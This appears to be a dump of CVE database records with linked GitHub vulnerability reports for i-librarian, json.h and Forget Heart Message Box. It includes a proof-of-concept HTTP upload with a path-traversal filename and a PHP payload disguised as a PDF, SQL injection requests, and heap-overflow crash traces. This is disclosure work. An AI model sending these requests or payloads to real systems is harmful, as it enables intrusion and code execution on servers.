[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mkucej/i-librarian/issues/155" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mkucej/i-librarian/issues/155#issue-1501906608" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mkucej/i-librarian/issues/155" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mkucej/i-librarian/issues/155#issue-1501906608" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:i-librarian:i-librarian:4.10:*:*:*:*:*:*:*", "matchCriteriaId": "E91C680F-5011-49A3-9C1D-70C19BA22D89", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/mkucej/i-librarian/issues/155#issue-1501906608
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "mkucej", "i-librarian" ]
# Summary The $_POST['filename'] is not filtered so that the php suffix file can be uploaded across directories. # Detail Using the replace PDF function, an attacker can upload a file with php as the suffix and %PDF as the beginning of file content to any directory by controlling the filename parameter. ``` if (in_array($file_extension, array('doc', 'docx', 'vsd', 'xls', 'xlsx', 'ppt', 'pptx', 'odt', 'ods', 'odp'))) ... ... else move_uploaded_file($_FILES['form_new_file']['tmp_name'], IL_TEMP_PATH . DIRECTORY_SEPARATOR . 'lib_' . session_id() . DIRECTORY_SEPARATOR . $_POST['filename']); ``` # POC like this ``` POST /ajaxsupplement.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------36332819052109193833351732483 Content-Length: 981 Origin: http://127.0.0.1 DNT: 1 Connection: close Referer: http://127.0.0.1/index2.php Cookie: PHPSESSID=i7l1jt5cp8bbgt41p888aii2r7 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------36332819052109193833351732483 Content-Disposition: form-data; name="file" 1 -----------------------------36332819052109193833351732483 Content-Disposition: form-data; name="filename" ../../z.php -----------------------------36332819052109193833351732483 Content-Disposition: form-data; name="form_new_file"; filename="1.php" Content-Type: application/pdf %PDF <?php phpinfo();?> -----------------------------36332819052109193833351732483 Content-Disposition: form-data; name="form_new_file_link" -----------------------------36332819052109193833351732483 Content-Disposition: form-data; name="form_graphical_abstract" -----------------------------36332819052109193833351732483 Content-Disposition: form-data; name="form_supplementary_file[]" -----------------------------36332819052109193833351732483 Content-Disposition: form-data; name="proxystr" -----------------------------36332819052109193833351732483--
Arbitrary file upload in ajaxsupplement.php
https://api.github.com/repos/mkucej/i-librarian/issues/155/comments
0
2022-12-18T13:41:09Z
2022-12-18T13:41:09Z
https://github.com/mkucej/i-librarian/issues/155
1,501,906,608
155
4,674
CVE-2022-45494
2023-01-31T22:15:08.200
Buffer overflow vulnerability in function json_parse_object in sheredom json.h before commit 0825301a07cbf51653882bf2b153cc81fdadf41 (November 14, 2022) allows attackers to code arbitrary code and gain escalated privileges.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hyrathon/trophies/security/advisories/GHSA-wvpq-p7pp-cj6m" }, { "source": "cve@mitre.org", "tags": [ "Product", "Third Party Advisory" ], "url": "https://github.com/sheredom/json.h" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/sheredom/json.h/issues/93" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/sheredom/json.h/issues/97" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hyrathon/trophies/security/advisories/GHSA-wvpq-p7pp-cj6m" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Third Party Advisory" ], "url": "https://github.com/sheredom/json.h" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/sheredom/json.h/issues/93" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/sheredom/json.h/issues/97" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:json.h_project:json.h:*:*:*:*:*:*:*:*", "matchCriteriaId": "4297B9CE-4503-4DAE-886C-FCB54417DF05", "versionEndExcluding": "2022-11-14", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/sheredom/json.h/issues/93
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "sheredom", "json.h" ]
# Heap Overflow in json_parse_object() In `json_parse_object()`, there is a heap out-of-bound write. The bug can be triggered with an invocation of `json_parse_ex()` with specific flags combination. The root cause of this vulnerability is that the parser use value directly taken from `state->dom` as `value_ex`, while doesn't validate the bound of `state->dom` ```c if (json_parse_flags_allow_location_information & flags_bitset) { struct json_value_ex_s *value_ex = (struct json_value_ex_s *)state->dom; state->dom += sizeof(struct json_value_ex_s); value_ex->offset = state->offset; value_ex->line_no = state->line_no; value_ex->row_no = state->offset - state->line_offset; ``` Similar situation can also be found at: ```c if (json_parse_flags_allow_location_information & flags_bitset) { struct json_string_ex_s *string_ex = (struct json_string_ex_s *)state->dom; state->dom += sizeof(struct json_string_ex_s); string_ex->offset = state->offset; string_ex->line_no = state->line_no; string_ex->row_no = state->offset - state->line_offset; ``` Here is the output of Google ASAN when the vulnerability is triggerred: ``` The flags is 0x5fd628d6d6247bff ================================================================= ==4959==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6130000001b8 at pc 0x55f27037a5df bp 0x7fff30738e90 sp 0x7fff30738e88 WRITE of size 8 at 0x6130000001b8 thread T0 #0 0x55f27037a5de in json_parse_object /home/hyrathon/Desktop/jsonh/./json.h:1709:24 #1 0x55f27037b1c8 in json_parse_value /home/hyrathon/Desktop/jsonh/./json.h:1940:5 #2 0x55f270383c85 in json_parse_ex /home/hyrathon/Desktop/jsonh/./json.h:2129:3 #3 0x55f27039a192 in main /home/hyrathon/Desktop/jsonh/fuzz.c:29:5 #4 0x7f555df76d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 #5 0x7f555df76e3f in __libc_start_main csu/../csu/libc-start.c:392:3 #6 0x55f2702a8314 in _start (/home/hyrathon/Desktop/jsonh/san+0x33314) (BuildId: a0e983e1c9c38a8763824dc5481f79d22fe8c82a) 0x6130000001b9 is located 0 bytes to the right of 377-byte region [0x613000000040,0x6130000001b9) allocated by thread T0 here: #0 0x55f27032b15e in __interceptor_malloc (/home/hyrathon/Desktop/jsonh/san+0xb615e) (BuildId: a0e983e1c9c38a8763824dc5481f79d22fe8c82a) #1 0x55f270382f15 in json_parse_ex /home/hyrathon/Desktop/jsonh/./json.h:2088:18 #2 0x55f27039a192 in main /home/hyrathon/Desktop/jsonh/fuzz.c:29:5 #3 0x7f555df76d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/hyrathon/Desktop/jsonh/./json.h:1709:24 in json_parse_object Shadow bytes around the buggy address: 0x0c267fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c267fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c267fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c267fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c267fff8020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c267fff8030: 00 00 00 00 00 00 00[01]fa fa fa fa fa fa fa fa 0x0c267fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c267fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c267fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c267fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c267fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==4959==ABORTING ``` The input to trigger this bug is attached. The first 8 bytes are the flags for `json_parse_ex()` and the rest is the content(src). Please use address sanitizer to reproduce the bug, as non-crash overflow is hard to detect or locate without shadow memory. I also attach the input that can cause the other overflow I mentioned. [crash1.zip](https://github.com/sheredom/json.h/files/10000497/crash1.zip)
Heap Overflow in json_parse_object()
https://api.github.com/repos/sheredom/json.h/issues/93/comments
0
2022-11-14T07:22:58Z
2022-11-14T16:46:30Z
https://github.com/sheredom/json.h/issues/93
1,447,529,698
93
4,675
CVE-2022-45494
2023-01-31T22:15:08.200
Buffer overflow vulnerability in function json_parse_object in sheredom json.h before commit 0825301a07cbf51653882bf2b153cc81fdadf41 (November 14, 2022) allows attackers to code arbitrary code and gain escalated privileges.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hyrathon/trophies/security/advisories/GHSA-wvpq-p7pp-cj6m" }, { "source": "cve@mitre.org", "tags": [ "Product", "Third Party Advisory" ], "url": "https://github.com/sheredom/json.h" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/sheredom/json.h/issues/93" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/sheredom/json.h/issues/97" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hyrathon/trophies/security/advisories/GHSA-wvpq-p7pp-cj6m" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Third Party Advisory" ], "url": "https://github.com/sheredom/json.h" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/sheredom/json.h/issues/93" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/sheredom/json.h/issues/97" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:json.h_project:json.h:*:*:*:*:*:*:*:*", "matchCriteriaId": "4297B9CE-4503-4DAE-886C-FCB54417DF05", "versionEndExcluding": "2022-11-14", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/sheredom/json.h/issues/97
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "sheredom", "json.h" ]
# Another Heap OOB in json_parse_object() In `json_parse_object()`, there is a heap out-of-bound write. The bug can be triggered with an invocation of `json_parse_ex()` with specific flags combination. The root cause of this vulnerability is that the parameter `object` transferred to `json_parse_obect()` is not properly sanitized, and it is pointed to out-of-bound position assigned by upper layer function. Here is the output of Google ASAN when the vulnerability is triggerred: ``` The flags is 0x5fd6d7d6d6247bdf ================================================================= ==5354==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61a000000550 at pc 0x557f8e3323e7 bp 0x7ffd29216ab0 sp 0x7ffd29216aa8 WRITE of size 8 at 0x61a000000550 thread T0 #0 0x557f8e3323e6 in json_parse_object /home/hyrathon/Desktop/jsonh/./json.h:1670:21 #1 0x557f8e334ad9 in json_parse_value /home/hyrathon/Desktop/jsonh/./json.h:1955:7 #2 0x557f8e3338f0 in json_parse_object /home/hyrathon/Desktop/jsonh/./json.h:1719:5 #3 0x557f8e334ad9 in json_parse_value /home/hyrathon/Desktop/jsonh/./json.h:1955:7 #4 0x557f8e3338f0 in json_parse_object /home/hyrathon/Desktop/jsonh/./json.h:1719:5 #5 0x557f8e334ad9 in json_parse_value /home/hyrathon/Desktop/jsonh/./json.h:1955:7 #6 0x557f8e338d4b in json_parse_array /home/hyrathon/Desktop/jsonh/./json.h:1809:5 #7 0x557f8e334ed5 in json_parse_value /home/hyrathon/Desktop/jsonh/./json.h:1962:7 #8 0x557f8e3338f0 in json_parse_object /home/hyrathon/Desktop/jsonh/./json.h:1719:5 #9 0x557f8e3341c8 in json_parse_value /home/hyrathon/Desktop/jsonh/./json.h:1940:5 #10 0x557f8e33cc85 in json_parse_ex /home/hyrathon/Desktop/jsonh/./json.h:2129:3 #11 0x557f8e353192 in main /home/hyrathon/Desktop/jsonh/fuzz.c:29:5 #12 0x7fae53ff9d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 #13 0x7fae53ff9e3f in __libc_start_main csu/../csu/libc-start.c:392:3 #14 0x557f8e261314 in _start (/home/hyrathon/Desktop/jsonh/san+0x33314) (BuildId: a0e983e1c9c38a8763824dc5481f79d22fe8c82a) 0x61a000000550 is located 0 bytes to the right of 1232-byte region [0x61a000000080,0x61a000000550) allocated by thread T0 here: #0 0x557f8e2e415e in __interceptor_malloc (/home/hyrathon/Desktop/jsonh/san+0xb615e) (BuildId: a0e983e1c9c38a8763824dc5481f79d22fe8c82a) #1 0x557f8e33bf15 in json_parse_ex /home/hyrathon/Desktop/jsonh/./json.h:2088:18 #2 0x557f8e353192 in main /home/hyrathon/Desktop/jsonh/fuzz.c:29:5 #3 0x7fae53ff9d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/hyrathon/Desktop/jsonh/./json.h:1670:21 in json_parse_object Shadow bytes around the buggy address: 0x0c347fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c347fff8060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c347fff8070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c347fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c347fff8090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c347fff80a0: 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa 0x0c347fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c347fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c347fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c347fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c347fff80f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==5354==ABORTING ``` The input to trigger this bug is attached. The first 8 bytes are the flags for `json_parse_ex()` and the rest is the content(src). Please use address sanitizer to reproduce the bug, as non-crash overflow is hard to detect or locate without shadow memory. Version: latest commit (bdcf2e1912aa4c0127f755f5f6271c539d6cbf9f) [crash-input.zip](https://github.com/sheredom/json.h/files/10000514/crash-input.zip)
Another Heap OOB in json_parse_object()
https://api.github.com/repos/sheredom/json.h/issues/97/comments
0
2022-11-14T07:25:18Z
2022-11-14T16:46:31Z
https://github.com/sheredom/json.h/issues/97
1,447,531,997
97
4,676
CVE-2023-24241
2023-02-01T00:15:10.840
Forget Heart Message Box v1.1 was discovered to contain a SQL injection vulnerability via the name parameter at /admin/loginpost.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Mortalwangxin/lives/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Mortalwangxin/lives/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:forget_heart_message_box_project:forget_heart_message_box:1.1:*:*:*:*:*:*:*", "matchCriteriaId": "125E4674-FA95-4147-80B6-C70917E9DDDD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/Mortalwangxin/lives/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Mortalwangxin", "lives" ]
# Forget Heart Message Box 1.1 has multiple SQL injections ## Vulnerability Type : SQL Injection ## Vulnerability Version : 1.1 ## Recurring environment: * Windows 10 * PHP 7.3.4 * Apache 2.4.43 ## Vulnerability Description AND recurrence: Vulnerability Documentation:*adminpost.php* ![image](https://user-images.githubusercontent.com/89826478/212703574-858b9a92-b8d4-482b-af3d-4c24422377c8.png) Parameter: name ```http POST /admin/loginpost.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://192.168.2.101/ Cookie: PHPSESSID=28s17sili7ldmc68goe212s593 Content-Length: 29 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Host: 192.168.2.101 Connection: Keep-alive login=&name=1232*&pass=123456 ``` ![image](https://user-images.githubusercontent.com/89826478/212704394-ad3995e3-1266-42f7-abdb-a5ee822cda13.png) ![image](https://user-images.githubusercontent.com/89826478/212704829-159ccd4a-54ae-474b-95e4-ea67881e4426.png) Vulnerability Documentation:*cha.php* Parameter: name ![image](https://user-images.githubusercontent.com/89826478/212705729-c4103457-4960-4a0f-85e8-007b57451c2d.png) ```http POST /cha.php HTTP/1.1 Host: 192.168.2.24 Content-Length: 57 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.2.24 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.2.24/cha.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=qhndee8uhjmf0g0nrul6nmcurs Connection: close name=1*&go=%E6%9F%A5%E8%AF%A2%E7%95%99%E8%A8%80 ``` ![image](https://user-images.githubusercontent.com/89826478/212706302-b60a498d-8f94-4f65-8bc1-7585c89373f8.png) ## Restoration suggestions Filtering of user input or using magic methods.
Forget Heart Message Box 1.1 has multiple SQL injections
https://api.github.com/repos/Mortalwangxin/lives/issues/1/comments
0
2023-01-16T14:56:17Z
2025-02-14T10:18:32Z
https://github.com/Mortalwangxin/lives/issues/1
1,535,073,143
1
4,677
CVE-2022-4254
2023-02-01T17:15:09.680
sssd: libsss_certmap fails to sanitise certificate data used in LDAP filters
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2022-4254" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2149894" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/SSSD/sssd/commit/a2b9a84460429181f2a4fa7e2bb5ab49fd561274" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/SSSD/sssd/issues/5135" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00028.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2022-4254" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2149894" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/SSSD/sssd/commit/a2b9a84460429181f2a4fa7e2bb5ab49fd561274" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/SSSD/sssd/issues/5135" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00028.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fedoraproject:sssd:*:*:*:*:*:*:*:*", "matchCriteriaId": "690E7363-ED75-400D-9F2F-5E87BEF9C238", "versionEndExcluding": "2.3.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.15.3", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "33C068A4-3780-4EAB-A937-6082DF847564", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "566507B6-AC95-47F7-A3FB-C6F414E45F51", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_power_big_endian:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "1CDCFF34-6F1D-45A1-BE37-6A0E17B04801", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "B4A684C7-88FD-43C4-9BDB-AE337FCBD0AB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_scientific_computing:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "37CE1DC7-72C5-483C-8921-0B462C8284D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "51EF4996-72F4-4FA4-814F-F5991E7A8318", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_server_aus:8.2:*:*:*:*:*:*:*", "matchCriteriaId": "6897676D-53F9-45B3-B27F-7FF9A4C58D33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions:8.1:*:*:*:*:*:*:*", "matchCriteriaId": "4DF2B9A2-8CA6-4EDF-9975-07265E363ED2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions:8.2:*:*:*:*:*:*:*", "matchCriteriaId": "7DA6A5AF-2EBE-4ED9-B312-DCD9D150D031", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_server_tus:8.2:*:*:*:*:*:*:*", "matchCriteriaId": "B09ACF2D-D83F-4A86-8185-9569605D8EE1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_server_update_services_for_sap_solutions:8.1:*:*:*:*:*:*:*", "matchCriteriaId": "48C2E003-A71C-4D06-B8B3-F93160568182", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "825ECE2D-E232-46E0-A047-074B34DB1E97", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "90" ]
90
https://github.com/SSSD/sssd/issues/5135
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "SSSD", "sssd" ]
